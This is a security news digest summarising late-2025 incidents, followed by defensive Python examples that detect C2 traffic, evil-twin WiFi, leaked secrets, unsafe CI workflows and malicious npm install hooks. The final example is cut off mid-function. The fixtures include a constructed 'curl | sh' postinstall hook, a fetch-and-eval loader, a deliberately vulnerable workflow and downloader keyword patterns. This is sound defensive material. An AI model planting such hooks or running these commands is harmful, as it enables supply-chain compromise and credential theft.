Daily Brief
Find articles below, see 'DETAILS' for generated summaries
Total articles found: 11541
Checks for new stories every ~15 minutes
| Timestamp | Source | Category | Title | Summary | Details |
|---|---|---|---|---|---|
| 2025-12-01 08:52:43 | thehackernews | MALWARE | Albiriox Malware-as-a-Service Targets Banking and Financial Apps | Albiriox, a new Android malware, is offered as a malware-as-a-service (MaaS) targeting over 400 applications, including banking and financial platforms, for on-device fraud and screen manipulation.
The malware employs social engineering tactics and packing techniques to evade detection, distributing its payload through dropper applications mimicking legitimate software updates.
Evidence suggests the malware's developers are Russian-speaking, with recruitment initially limited before expanding to a broader MaaS model.
Albiriox uses Virtual Network Computing (VNC) and Android accessibility services to control infected devices, bypassing protections such as FLAG_SECURE, the window flag that normally prevents screen capture of sensitive views.
The malware's capabilities include credential theft through overlay attacks and remote device control, posing significant risks to financial institutions and their customers.
Initial campaigns have specifically targeted Austrian users with fake app listings and SMS lures, exploiting German-language content to enhance credibility.
Albiriox is another case of capable mobile banking malware being sold as a service, which widens the pool of operators able to run overlay and remote-control fraud against mobile users worldwide. | Details |
| 2025-12-01 05:09:42 | thehackernews | NATION STATE ACTIVITY | Tomiris Adopts Public-Service Implants for Stealthier Government Attacks | The Tomiris threat actor has targeted foreign ministries and other government entities, primarily in Russia, using public services such as Telegram and Discord as command-and-control channels.
Routing C2 over well-known services makes the malicious traffic look like ordinary use of those platforms, so it rarely trips reputation-based blocking and has to be found through behavioural signals such as the API paths used, the process generating the traffic, and beaconing intervals.
Over 50% of spear-phishing emails used Russian names and text, indicating a focus on Russian-speaking targets, with additional campaigns in Central Asian countries.
Attacks utilize reverse shells, custom implants, and open-source C2 frameworks to facilitate post-exploitation, enhancing operational flexibility.
Tomiris is linked to the Kazakhstan-based threat actor Storm-0473, with overlaps identified with other threat clusters such as Cavalry Werewolf and Silent Lynx.
Phishing emails deliver malicious RAR archives containing executables that drop reverse shells and establish persistence through Windows Registry modifications.
The campaign's evolution reflects a focus on stealth, persistence, and strategic targeting of high-value political and diplomatic infrastructure. | Details |
| 2025-12-01 01:58:23 | theregister | DATA BREACH | Massive Data Leak Exposes Over 30 Million South Korean Customers | South Korean authorities are investigating a data breach involving over 30 million customer records from e-commerce giant Coupang, impacting more than half of the country's population.
Initially, the breach was thought to affect only 4,600 individuals, but new estimates reveal a far larger scope, including names, email addresses, and physical addresses.
The breach raises significant concerns regarding data security practices within Coupang and the e-commerce sector at large, prompting calls for enhanced protective measures.
Authorities have not yet disclosed how the data was taken; the scale alone suggests weaknesses in how Coupang controlled access to customer records.
Coupang can expect regulatory scrutiny and possible financial penalties, along with lasting operational and reputational cost. | Details |
| 2025-12-01 00:06:27 | theregister | MISCELLANEOUS | Swiss Government Advises Against SaaS Use Due to Security Concerns | Switzerland's Conference of Data Protection Officers advises public bodies to avoid SaaS and hyperscale cloud services, citing insufficient end-to-end encryption and potential data access by providers.
The resolution also cites the US CLOUD Act, under which US-based providers can be compelled to hand over data they hold regardless of where it is stored, which would undermine Swiss confidentiality obligations.
The resolution criticizes the unilateral amendment of terms by SaaS providers, which could weaken security and privacy measures.
Microsoft 365 is specifically mentioned as a service unsuitable for handling sensitive Swiss government data.
Security engineer Luke Marshall's GitLab scan uncovered 17,000 live secrets, including thousands of credentials for major cloud services, highlighting significant repository security risks.
Strava's updated terms of service warn users about geolocation risks, particularly for those in sensitive roles, following reports that its activity data revealed the movements of military and security personnel.
Leaked documents analyzed by Nariman Gharib reveal Iran's Charming Kitten group's involvement in espionage and assassination operations, emphasizing its growing sophistication.
Reports suggest the Israeli military may restrict Android smartphone use among top officials to minimize surveillance threats, opting for iOS devices instead. | Details |
| 2025-11-30 09:29:07 | thehackernews | VULNERABILITIES | CISA Flags Active Exploitation of XSS Flaw in OpenPLC ScadaBR | The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added CVE-2021-26829 to its Known Exploited Vulnerabilities catalog, indicating active exploitation of this cross-site scripting flaw.
Affecting OpenPLC ScadaBR on Windows and Linux, the stored XSS lets an attacker inject script into the web interface to manipulate system settings and deface pages, which is enough to disrupt operators of industrial control systems.
A pro-Russian hacktivist group, TwoNet, exploited the flaw in a honeypot simulating a water treatment facility, demonstrating the potential for rapid operational disruption.
Federal Civilian Executive Branch agencies must implement necessary patches by December 19, 2025, to mitigate risks associated with this vulnerability.
TwoNet, initially known for DDoS attacks, has expanded its activities to include industrial system targeting, doxxing, and ransomware services, raising the threat profile.
VulnCheck reported a long-running out-of-band application security testing (OAST) callback endpoint hosted on Google Cloud, pointing to a sustained exploitation operation, with much of the observed activity focused on Brazil.
The use of legitimate internet services like Google Cloud by attackers complicates detection efforts, as they blend malicious activity with normal network traffic.
The practical lesson is unchanged: a four-year-old web flaw in an ICS product is being exploited because exposed, unpatched instances still exist, so patch, keep HMI and SCADA web interfaces off the open internet, and monitor the ones that must be reachable. | Details |
| 2025-11-29 15:20:33 | bleepingcomputer | DATA BREACH | Asahi Group Data Breach Impacts 1.9 Million Individuals Globally | Asahi Group Holdings, Japan's leading beer producer, confirmed a data breach affecting up to 1.9 million individuals, compromising personal information like names, addresses, and emails.
The breach, initially disclosed in September, forced Asahi to halt production and shipping operations due to a ransomware attack by the Qilin group.
Qilin ransomware operators claimed responsibility, alleging possession of 27GB of Asahi's data, with proof shared on their data leak site.
Affected data varies by category, with customer data including contact details and employee data also containing birth dates; no payment card information was compromised.
Asahi has established a dedicated contact line for affected individuals and is actively restoring systems while resuming shipments in stages.
CEO Atsushi Katsuki announced ongoing efforts to enhance security measures, including network control improvements, threat detection upgrades, and revised business continuity plans.
For Asahi the data exposure and the production outage came from the same intrusion, a reminder that ransomware response plans have to cover notification and data exposure as well as restoring operations. | Details |
| 2025-11-28 18:30:22 | bleepingcomputer | CYBERCRIME | Australian Man Sentenced for In-Flight Evil Twin WiFi Attacks | A 44-year-old Australian was sentenced to over seven years for operating an "evil twin" WiFi network to steal data from travelers during flights and at airports.
The individual used a WiFi Pineapple device to mimic legitimate in-flight and airport networks, redirecting users to phishing pages that harvested social media credentials.
Thousands of intimate images and personal credentials were found on seized devices, highlighting the extensive nature of the data theft.
After authorities confiscated his equipment, the man attempted to delete evidence and accessed confidential information from his employer's laptop.
The Australian Federal Police warned the public about the dangers of free WiFi, recommending VPNs and caution with captive portals.
Evil twin attacks remain uncommon but are cheap to mount: the network name, captive portal and login page are all attacker-controlled, so travellers should treat any captive portal that asks for email or social media credentials as hostile. | Details |
| 2025-11-28 17:46:38 | bleepingcomputer | DATA BREACH | Over 17,000 Secrets Exposed in Public GitLab Repositories | A security engineer discovered over 17,000 exposed secrets across 5.6 million public GitLab repositories, affecting more than 2,800 unique domains.
The engineer employed TruffleHog, an open-source secret scanner, to identify credentials such as API keys, passwords and tokens in the repositories and to verify which of them were still live.
The scan revealed a significant presence of Google Cloud Platform credentials, followed by MongoDB keys, Telegram bot tokens, and OpenAI keys.
The process utilized GitLab's public API and AWS services, completing the scan in just over 24 hours at a cost of $770.
The researcher responsibly disclosed the findings to affected parties using automated notifications, resulting in multiple bug bounties totaling $9,000.
Although many organisations revoked their exposed secrets after notification, some remained valid, a reminder that rotation, not detection, is what closes the exposure.
Most leaked secrets date from after 2018, but some date back to 2009 and were still valid.
Preventing this requires pre-commit and CI secret scanning, short-lived credentials where possible, and rotation on exposure, since a secret committed to a public repository stays discoverable in git history even after the file is deleted. | Details |
| 2025-11-28 16:29:12 | theregister | MALWARE | Shai-Hulud 2.0 Worm Exploits CI/CD Flaw in PostHog SDK | PostHog experienced its largest security incident with the Shai-Hulud 2.0 worm, impacting its JavaScript SDKs and developer credentials.
The worm abused a flaw in PostHog's CI/CD automation that let code from an untrusted pull request run with the workflow's elevated privileges, giving it access to publishing credentials.
Affected packages, including those from Zapier and Postman, led to the compromise of over 25,000 developers' secrets in three days.
The malicious packages carried an npm preinstall lifecycle script, so the payload ran during installation before any application code, harvested credentials and pushed them to public GitHub repositories, from which the stolen tokens were used to publish further malicious packages.
PostHog responded by revoking compromised tokens, removing the malicious packages, and moving npm releases to a "trusted publisher" model, in which the registry accepts releases from an identified CI workflow via OIDC instead of a long-lived token.
The lesson for anyone running CI/CD is that workflows triggered by untrusted pull requests must not receive publishing secrets or a write-capable token, and that install-time scripts in dependencies execute with the same privileges as the build that installs them. | Details |
| 2025-11-28 16:29:11 | thehackernews | VULNERABILITIES | Legacy Python Scripts Pose Domain-Takeover Risk in PyPI Packages | ReversingLabs identified vulnerabilities in legacy Python packages, risking supply chain attacks via domain takeover on the Python Package Index (PyPI).
The vulnerability stems from outdated bootstrap scripts in packages such as tornado, pypiserver, and slapos.core, which fetch from a domain now available for sale.
The scripts automate library downloads and installations, fetching from python-distribute[.]org, a domain that could be weaponized by attackers.
Despite some packages removing the risky scripts, slapos.core and Tornado still include the vulnerable code, posing ongoing risks.
The scripts, written in Python 2, are not executed during a normal install; they run only if a developer invokes them directly, but anyone who does would download and execute whatever the domain's new owner serves.
Historical context shows similar domain takeover incidents, such as the npm package fsevents, emphasizing the need for vigilant package management.
HelixGuard's recent discovery of a malicious PyPI package further underscores the critical nature of securing software supply chains. | Details |
| 2025-11-28 16:22:11 | thehackernews | NATION STATE ACTIVITY | North Korean Hackers Exploit npm Registry with OtterCookie Malware | North Korean threat actors have published 197 malicious npm packages, downloaded more than 31,000 times, that spread an updated OtterCookie variant targeting JavaScript developers and cryptocurrency-related workflows.
The malware, combining features of BeaverTail and previous OtterCookie versions, evades detection, profiles systems, and establishes a command-and-control channel for remote access and data theft.
Attackers use fake job interviews to deceive victims into running Node.js applications, leading to malware infections, as documented by Cisco Talos in a case involving a Sri Lanka-based organization.
The campaign leverages a hard-coded Vercel URL to fetch the OtterCookie payload from a GitHub repository, with the GitHub account now inaccessible.
Fake assessment-themed websites deliver GolangGhost malware under the guise of fixing technical issues, employing ClickFix-style instructions for distribution.
GolangGhost achieves persistence on macOS via LaunchAgent scripts, capturing sensitive information through decoy applications mimicking Chrome prompts.
In contrast to the DPRK IT-worker scheme, in which operatives seek employment, this campaign targets job seekers themselves through fraudulent recruiting processes. | Details |
| 2025-11-28 16:12:27 | bleepingcomputer | DATA BREACH | French Football Federation Reports Data Breach Affecting Club Members | The French Football Federation (FFF) experienced a data breach via a compromised account accessing administrative management software used by football clubs.
Attackers stole personal information, including names, birth details, and contact information of French football club members.
In response, the FFF disabled the compromised account, reset all user passwords, and secured the affected systems.
The FFF has filed a criminal complaint and notified France's National Cybersecurity Agency (ANSSI) and the National Commission on Informatics and Liberty (CNIL).
Members are advised to be cautious of communications requesting sensitive information, as attackers may attempt phishing scams.
The FFF is enhancing its security measures to address the growing threat landscape and protect entrusted data.
This incident follows another recent breach affecting the French social security service, highlighting a trend of increasing cyberattacks in France. | Details |
| 2025-11-28 15:55:58 | theregister | DATA BREACH | Brsk Data Breach Exposes 230,000 Customer Records to Cybercriminals | British telecommunications company Brsk confirmed a data breach affecting over 230,000 customer records, with data being auctioned on a cybercrime forum.
The compromised data includes full names, email and home addresses, phone numbers, and indicators of vulnerability status, although no financial or login credentials were accessed.
Brsk is providing affected customers with 12 months of free personal, financial, and web-monitoring services through Experian as a precautionary measure.
The breach has been reported to the Information Commissioner's Office, police, and relevant regulatory bodies, with specialist security partners engaged for investigation.
The incident did not impact Brsk's core network or broadband services, ensuring continuity of operations for its 140,000 registered customers.
This breach places Brsk alongside other UK telcos like Colt and ICUK, which have faced cybersecurity challenges this year, highlighting the sector's ongoing vulnerabilities.
Brsk has emphasised the speed and transparency of its response; affected customers should still expect targeted phishing, since the leaked set pairs contact details with vulnerability status. | Details |
| 2025-11-28 15:46:58 | theregister | DATA BREACH | GrapheneOS Abandons OVHcloud Amid Concerns Over French Privacy Laws | GrapheneOS, a mobile operating system, has ceased using OVHcloud servers due to concerns about France's digital privacy stance and potential state access to data.
The decision reflects apprehension over France's support for EU legislation potentially mandating backdoors in encryption for state surveillance purposes.
OVHcloud's reputation is further challenged by ongoing legal battles in Canada regarding data sovereignty, raising industry-wide concerns.
GrapheneOS's move is part of a wider pattern of privacy-focused projects choosing hosting jurisdictions on the basis of national surveillance and data-access law rather than price or features.
It also shows that a government's stance on encryption backdoors can cost its domestic cloud providers business, regardless of those providers' own security posture. | Details |
| 2025-11-28 13:33:31 | theregister | MISCELLANEOUS | TryHackMe Faces Backlash Over Lack of Gender Diversity in Event | TryHackMe is addressing criticism for an all-male lineup in its Advent of Cyber event, a 24-day beginner-level cyber training program.
The company is collaborating with Eva Benn from Microsoft to recruit female cybersecurity professionals to join the event's helper list.
The initial absence of women was attributed to scheduling conflicts and non-responses from female creators, not a lack of effort.
Ethical hacker Katie Paxton-Fear confirmed she was approached but unable to participate due to prior commitments.
The situation has sparked broader discussions about gender diversity and representation in the cybersecurity industry.
Influencers like Caitlin Sarian and Lesley Carhart have criticized the event, pointing to deeper issues of sexism and influencer culture.
TryHackMe is actively expanding its roster to include more women, acknowledging the need for better communication and representation. | Details |
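The Tomiris entry above (2025-12-01 05:09:42) notes that command-and-control over Telegram and Discord blends with legitimate traffic. The following is an added example, not detection content from Kaspersky or from the article: it parses constructed proxy log lines (the CSV layout, IPs, hostnames, bot token, webhook token and process names are all fabricated) and flags Telegram Bot API or Discord webhook use by processes that are not the expected clients, then checks each flagged flow for fixed-interval beaconing.

```python
"""Added example: detecting Telegram Bot API and Discord webhook traffic that
looks like C2 rather than normal client use. Log lines are constructed."""
import csv
import io
import statistics
from datetime import datetime

# Constructed proxy log: every IP, token and process name is fabricated.
LOG = """ts,src_ip,host,path,user_agent,process
2025-11-30T10:00:00,10.0.0.5,api.telegram.org,/bot123456789:AAEfabricatedToken/getUpdates,python-requests/2.31.0,updater.exe
2025-11-30T10:01:00,10.0.0.5,api.telegram.org,/bot123456789:AAEfabricatedToken/getUpdates,python-requests/2.31.0,updater.exe
2025-11-30T10:02:00,10.0.0.5,api.telegram.org,/bot123456789:AAEfabricatedToken/getUpdates,python-requests/2.31.0,updater.exe
2025-11-30T10:03:00,10.0.0.5,api.telegram.org,/bot123456789:AAEfabricatedToken/getUpdates,python-requests/2.31.0,updater.exe
2025-11-30T10:04:00,10.0.0.5,api.telegram.org,/bot123456789:AAEfabricatedToken/sendDocument,python-requests/2.31.0,updater.exe
2025-11-30T10:00:12,10.0.0.9,discord.com,/api/v9/gateway,Discord/1.0.9 Electron,Discord.exe
2025-11-30T10:05:40,10.0.0.9,cdn.discordapp.com,/attachments/1/2/photo.png,Discord/1.0.9 Electron,Discord.exe
2025-11-30T10:07:03,10.0.0.7,discord.com,/api/webhooks/1122334455/fabricatedWebhookToken,curl/8.4.0,cmd.exe
2025-11-30T10:09:15,10.0.0.11,discord.com,/app,Mozilla/5.0 (Windows NT 10.0) Chrome/120,chrome.exe
"""

# Public services commonly repurposed as C2 or exfiltration channels.
C2_CAPABLE_HOSTS = {"api.telegram.org", "discord.com", "discordapp.com", "cdn.discordapp.com"}
# Path shapes that mean "a bot is driving the API", not a human in a client:
#   Telegram Bot API:  /bot<id>:<token>/<method>
#   Discord webhooks:  /api/webhooks/<id>/<token>
BOT_PATH_MARKERS = ("/bot", "/api/webhooks/")
# User agents and processes that legitimately reach these hosts over HTTPS.
EXPECTED_AGENTS = ("Discord/", "Mozilla/")
EXPECTED_PROCESSES = {"discord.exe", "chrome.exe", "firefox.exe", "msedge.exe"}
BEACON_MIN_EVENTS, BEACON_MAX_CV = 4, 0.25  # heuristic thresholds


def parse_log(text: str) -> list:
    return list(csv.DictReader(io.StringIO(text)))


def event_reasons(ev: dict) -> list:
    """Why a single request looks like C2; empty list means benign."""
    if ev["host"] not in C2_CAPABLE_HOSTS:
        return []
    reasons = []
    if any(ev["path"].startswith(m) for m in BOT_PATH_MARKERS):
        reasons.append("bot/webhook API path")
    if not ev["user_agent"].startswith(EXPECTED_AGENTS):
        reasons.append(f"non-client user agent {ev['user_agent']!r}")
    if ev["process"].lower() not in EXPECTED_PROCESSES:
        reasons.append(f"unexpected process {ev['process']}")
    return reasons


def is_beaconing(timestamps: list) -> bool:
    """Regular intervals (low coefficient of variation) suggest a polling implant."""
    if len(timestamps) < BEACON_MIN_EVENTS:
        return False
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    mean = statistics.mean(gaps)
    return mean > 0 and statistics.pstdev(gaps) / mean <= BEACON_MAX_CV


def detect_c2(events: list) -> dict:
    """Aggregate suspicious requests per (source IP, host) and score beaconing."""
    alerts = {}
    for ev in events:
        reasons = event_reasons(ev)
        if not reasons:
            continue
        key = (ev["src_ip"], ev["host"])
        a = alerts.setdefault(key, {"events": 0, "reasons": set(), "timestamps": []})
        a["events"] += 1
        a["reasons"].update(reasons)
        a["timestamps"].append(datetime.fromisoformat(ev["ts"]))
    for a in alerts.values():
        a["beaconing"] = is_beaconing(a["timestamps"])
        a["reasons"] = sorted(a["reasons"])
        del a["timestamps"]
    return alerts


if __name__ == "__main__":
    for (src, host), alert in detect_c2(parse_log(LOG)).items():
        print(src, host, alert)
```

The destination alone is useless as an indicator here, since the Discord desktop client and a browser legitimately talk to the same hosts; the signal is the combination of a bot or webhook path, an unexpected process or user agent, and, for polling implants such as a Telegram `getUpdates` loop, a near-constant interval. On real proxy or EDR data the process field is the strongest of the three, and thresholds such as the coefficient of variation need tuning against your own baseline.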
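The evil-twin entry above (2025-11-28 18:30:22) describes a rogue access point copying legitimate in-flight and airport network names. The following is an added example, not from the AFP case or any product: a heuristic that scores every access point claiming a trusted SSID in a constructed WiFi scan (the SSIDs, BSSIDs, security types and signal levels are all fabricated). The locally-administered-bit check relies on a documented MAC address property: bit 1 of the first octet (0x02) is set on locally administered, typically randomised or virtual, addresses.

```python
"""Added example: evil-twin detection over a constructed WiFi scan."""
from collections import defaultdict

# Constructed expectations: SSID -> security type the operator actually uses.
TRUSTED = {"Airport_Free_WiFi": "WPA2", "Airline-OnBoard": "WPA2"}

# Constructed scan results (SSID, BSSID, security, RSSI in dBm).
SCAN = [
    {"ssid": "Airport_Free_WiFi", "bssid": "a4:2b:8c:10:20:30", "security": "WPA2", "rssi": -62},
    {"ssid": "Airport_Free_WiFi", "bssid": "a4:2b:8c:10:20:31", "security": "WPA2", "rssi": -67},
    {"ssid": "Airport_Free_WiFi", "bssid": "02:13:37:aa:bb:cc", "security": "OPEN", "rssi": -38},
    {"ssid": "Airline-OnBoard", "bssid": "a4:2b:8c:44:55:66", "security": "WPA2", "rssi": -70},
    {"ssid": "Airline OnBoard", "bssid": "02:13:37:aa:bb:cd", "security": "OPEN", "rssi": -41},
    {"ssid": "Cafe-Guest", "bssid": "f0:9f:c2:01:02:03", "security": "OPEN", "rssi": -75},
]

SIGNAL_GAP_DB = 15  # heuristic: a twin run from a nearby laptop is much louder


def normalize(ssid: str) -> str:
    """Collapse case and punctuation so 'Airline OnBoard' matches 'Airline-OnBoard'."""
    return "".join(ch for ch in ssid.lower() if ch.isalnum())


def is_locally_administered(bssid: str) -> bool:
    return int(bssid.split(":")[0], 16) & 0x02 != 0


def oui(bssid: str) -> str:
    """First three octets: the vendor prefix of a globally assigned MAC."""
    return bssid[:8].lower()


def detect_evil_twins(scan: list, trusted: dict) -> list:
    """Return findings for APs that claim (or look like) a trusted SSID."""
    trusted_norm = {normalize(s): (s, sec) for s, sec in trusted.items()}
    by_ssid = defaultdict(list)
    for ap in scan:
        by_ssid[ap["ssid"]].append(ap)

    findings = []
    for ap in scan:
        match = trusted_norm.get(normalize(ap["ssid"]))
        if not match:
            continue  # only judge APs that claim a trusted name
        real_name, expected_sec = match
        reasons = []
        if ap["ssid"] != real_name:
            reasons.append(f"lookalike of trusted SSID {real_name!r}")
        if ap["security"] != expected_sec:
            reasons.append(f"security {ap['security']} differs from expected {expected_sec}")
        siblings = [o for o in by_ssid[ap["ssid"]] if o is not ap]
        if siblings and all(oui(o["bssid"]) != oui(ap["bssid"]) for o in siblings):
            reasons.append("vendor prefix differs from every other AP with this SSID")
        if is_locally_administered(ap["bssid"]):
            reasons.append("locally administered (randomised/virtual) BSSID")
        if siblings and ap["rssi"] - max(o["rssi"] for o in siblings) >= SIGNAL_GAP_DB:
            reasons.append("far stronger than the other APs with this SSID")
        if reasons:
            findings.append({"ssid": ap["ssid"], "bssid": ap["bssid"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect_evil_twins(SCAN, TRUSTED):
        print(f)
```

No single indicator is decisive: enterprise deployments legitimately run many BSSIDs under one SSID, and some access points use locally administered addresses for virtual SSIDs. What separates the two flagged entries from the real APs in the constructed scan is the stack of indicators, above all an open network impersonating a name the operator serves with WPA2. Clients cannot see most of this, which is why the AFP advice to avoid entering credentials into captive portals is the user-side mitigation.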
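The GitLab secrets entry above (2025-11-28 17:46:38) reports the mix of credential types TruffleHog found: Google Cloud keys, MongoDB URIs, Telegram bot tokens, OpenAI keys. The following is an added example, not the researcher's pipeline or TruffleHog's code: a compact detector of the same kind, with specific patterns for those four formats plus an entropy-gated catch-all for generic `SECRET=` assignments, run offline over constructed file contents in which every value is fabricated.

```python
"""Added example: a small secret detector in the style of the GitLab scan."""
import math
import re
from collections import Counter

# Specific detectors. Each format is publicly documented:
#   Telegram bot tokens:  <numeric bot id>:<35 URL-safe characters>
#   OpenAI API keys:      prefix "sk-"
#   MongoDB URIs:         mongodb:// or mongodb+srv:// carrying user:password@
#   GCP service accounts: JSON with "type": "service_account" and a PEM key
PATTERNS = {
    "telegram_bot_token": re.compile(r"\b\d{8,10}:[A-Za-z0-9_-]{35}\b"),
    "openai_api_key": re.compile(r"\bsk-[A-Za-z0-9_-]{20,}"),
    "mongodb_uri_with_password": re.compile(
        r"mongodb(?:\+srv)?://[^:/\s]+:[^@/\s]+@[^\s'\"]+"),
    "gcp_service_account_key": re.compile(
        r'"type"\s*:\s*"service_account"[\s\S]*?-----BEGIN PRIVATE KEY-----'),
}

# Generic catch-all: a secret-looking name assigned a long, high-entropy value.
# This is the noisiest class; the entropy gate and placeholder filter keep it usable.
GENERIC = re.compile(
    r"(?i)(?:secret|token|password|passwd|api[_-]?key)\w*\s*[:=]\s*['\"]?"
    r"([A-Za-z0-9_\-/+=]{16,})")
PLACEHOLDERS = {"changeme", "password", "example", "xxxxxxxxxxxxxxxx"}
ENTROPY_THRESHOLD = 3.5  # bits per character; random base62 scores about 5.9

# Constructed sample file: every value below is fabricated.
SAMPLE = """# constructed sample: every value below is fabricated
TELEGRAM_TOKEN=123456789:AAE1b2c3D4e5F6g7H8i9J0k1L2m3N4o5P6q
OPENAI_API_KEY="sk-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
MONGO_URL=mongodb+srv://appuser:Sup3rS3cret@cluster0.example.net/prod
DB_PASSWORD=changeme
API_SECRET = 'k8Qz2vR7mN4pL1xW9tY3bH6cJ0dF5gA8'
{"type": "service_account", "project_id": "demo", "private_key": "-----BEGIN PRIVATE KEY----- MIIE...fabricated... -----END PRIVATE KEY-----"}
"""


def shannon_entropy(value: str) -> float:
    counts = Counter(value)
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def redact(value: str) -> str:
    """Never echo the full secret into a report or ticket."""
    return value[:4] + "..." + value[-2:] if len(value) > 8 else "***"


def scan(text: str) -> list:
    """One finding per detected secret: kind, 1-based line number, redacted value."""
    findings = []
    seen_values = set()
    for kind, pattern in PATTERNS.items():
        for m in pattern.finditer(text):
            seen_values.add(m.group(0))
            findings.append({"kind": kind,
                             "line": text.count("\n", 0, m.start()) + 1,
                             "value": redact(m.group(0))})
    for m in GENERIC.finditer(text):
        value = m.group(1)
        if value in seen_values or value.lower() in PLACEHOLDERS:
            continue  # already reported by a specific detector, or a dummy value
        if shannon_entropy(value) < ENTROPY_THRESHOLD:
            continue  # low entropy: "aaaa..." or a word, not a key
        findings.append({"kind": "high_entropy_assignment",
                         "line": text.count("\n", 0, m.start(1)) + 1,
                         "value": redact(value)})
    return sorted(findings, key=lambda f: f["line"])


def count_by_kind(findings: list) -> dict:
    """The per-type breakdown the article reports (GCP first, then MongoDB, ...)."""
    return dict(Counter(f["kind"] for f in findings))


if __name__ == "__main__":
    for f in scan(SAMPLE):
        print(f)
    print(count_by_kind(scan(SAMPLE)))
```

Pattern matching only tells you that something shaped like a credential is present; the scan described in the article went one step further and verified each candidate against the provider, which is how it could report live secrets rather than guesses. Run a detector like this in a pre-commit hook and in CI, and treat every verified hit as an incident that ends with rotation, because the value remains in git history after the offending file is removed.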
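The PostHog entry above (2025-11-28 16:29:12) says the worm got in through a CI/CD automation flaw that let a malicious pull request run with elevated privileges. The page does not give PostHog's exact workflow, so the following is an added example, not PostHog's configuration or its fix: a heuristic audit of GitHub Actions workflow text for the best-known form of that flaw, a `pull_request_target` job (which runs in the base repository's context with secrets and a privileged `GITHUB_TOKEN`) that checks out and runs the pull request's own code. Both workflows below are constructed; the secret name `NPM_TOKEN` and the job names are illustrative.

```python
"""Added example: heuristic audit of GitHub Actions workflow text for the
"untrusted PR runs with base-repo privileges" pattern. Workflows are constructed."""
import re

# Documented GitHub Actions behaviour that the checks rely on:
#  - pull_request_target runs in the base repo with secrets and a privileged token;
#  - pull_request from a fork gets a read-only token and no secrets;
#  - `npm ci` runs the dependency tree's preinstall/postinstall scripts.
PR_TARGET = re.compile(
    r"^\s*(?:-\s*)?pull_request_target\b|\[[^\]]*\bpull_request_target\b", re.M)
PR_HEAD_CHECKOUT = re.compile(r"github\.event\.pull_request\.head\.(?:sha|ref)")
SECRET_REFS = re.compile(r"\$\{\{\s*secrets\.([A-Za-z0-9_]+)")
PKG_INSTALL = re.compile(r"\b(?:npm|pnpm|yarn)\s+(?:ci|install|i)\b")
PERMISSIONS_BLOCK = re.compile(r"^\s*permissions\s*:", re.M)

# Constructed vulnerable workflow: PR code is checked out and executed in a
# job that holds a publishing secret.
VULNERABLE = """\
name: pr-preview
on:
  pull_request_target:
    types: [opened, synchronize]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - run: npm ci && npm run build
      - run: npm publish --tag pr-${{ github.event.number }}
        env:
          NODE_AUTH_TOKEN: ${{ secrets.NPM_TOKEN }}
"""

# Constructed hardened workflow: unprivileged trigger, read-only token,
# no secrets, and dependency lifecycle scripts disabled.
HARDENED = """\
name: pr-preview
on:
  pull_request:
permissions:
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci --ignore-scripts && npm run build
"""


def audit_workflow(text: str) -> list:
    """Return human-readable findings; an empty list means nothing was flagged."""
    findings = []
    privileged_trigger = bool(PR_TARGET.search(text))
    if privileged_trigger and PR_HEAD_CHECKOUT.search(text):
        findings.append("pull_request_target checks out the PR head: "
                        "untrusted code runs with base-repo privileges")
    secrets = SECRET_REFS.findall(text)
    if privileged_trigger and secrets:
        findings.append("secrets exposed to a pull_request_target job: "
                        + ", ".join(sorted(set(secrets))))
    if privileged_trigger and PKG_INSTALL.search(text) and "--ignore-scripts" not in text:
        findings.append("package install under pull_request_target runs the PR's "
                        "npm lifecycle scripts (preinstall/postinstall)")
    if not PERMISSIONS_BLOCK.search(text):
        findings.append("no explicit permissions block: GITHUB_TOKEN inherits the "
                        "repository default, which may be read-write")
    return findings


if __name__ == "__main__":
    print("vulnerable:", audit_workflow(VULNERABLE))
    print("hardened:", audit_workflow(HARDENED))
```

This is a line-oriented heuristic rather than a YAML parser, so it will miss workflows that build the ref from an expression or pull it from a reusable workflow. The structural fix is the one the hardened example shows: anything that runs PR code uses the unprivileged `pull_request` trigger, and a job that needs secrets never checks out untrusted code. Where a preview genuinely needs to publish, split it into an unprivileged build and a privileged `workflow_run` publish step that consumes the build's artifact, or, as PostHog did, move publishing to npm trusted publishing so there is no long-lived token in the workflow to steal.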
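Two entries above rely on the same install-time execution mechanism: the Shai-Hulud 2.0 packages (2025-11-28 16:29:12) ran a preinstall script that exfiltrated credentials, and the OtterCookie packages (2025-11-28 16:22:11) fetched their payload from a hard-coded URL. The following is an added example, not code from PostHog, from either malware family, or from any of the reports: an offline audit of an npm package's lifecycle hooks that follows `node <file>` into the packaged script and flags downloads, decoding, `eval` and process spawning. The manifests, file contents, hostnames and IP address (a TEST-NET address) are all constructed.

```python
"""Added example: auditing npm lifecycle hooks for install-time payloads."""
import json
import re
from urllib.parse import urlparse

# Hooks npm runs automatically during `npm install` (documented npm behaviour).
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare")
URL_RE = re.compile(r"https?://[^\s'\"`)<>]+")
DOWNLOADER_RE = re.compile(
    r"\b(?:curl|wget|node\s+-e|eval|base64\s+(?:-d|--decode)|powershell|Invoke-WebRequest)\b")
NODE_FILE_RE = re.compile(r"\bnode\s+([\w./-]+\.[cm]?js)\b")
JS_FETCH_RE = re.compile(r"\b(?:fetch|axios|https?\.(?:get|request))\s*\(")
JS_DANGER_RE = re.compile(r"\b(?:eval|new Function|child_process|execSync|spawnSync|spawn)\b")

# Constructed manifests and packaged files; names and hosts are fabricated.
BENIGN = {"name": "native-widget", "version": "1.0.0",
          "scripts": {"postinstall": "node-gyp rebuild", "test": "jest"}}

MALICIOUS = {"name": "fake-color-utils", "version": "4.2.1",
             "scripts": {"preinstall": "node setup.js", "test": "echo ok"}}
MALICIOUS_FILES = {"setup.js": (
    "// constructed: hostname below is fabricated\n"
    "const u = 'https://constructed-preview.vercel.app/p';\n"
    "fetch(u).then(r => r.text()).then(code => eval(code));\n")}

CURL_PIPE = {"name": "fake-cli-helper", "version": "0.0.3",
             "scripts": {"postinstall": "curl -fsSL https://203.0.113.7/i.sh | sh"}}


def audit_package(manifest: dict, files: dict) -> list:
    """Flag install-time hooks that download, decode, evaluate or spawn.

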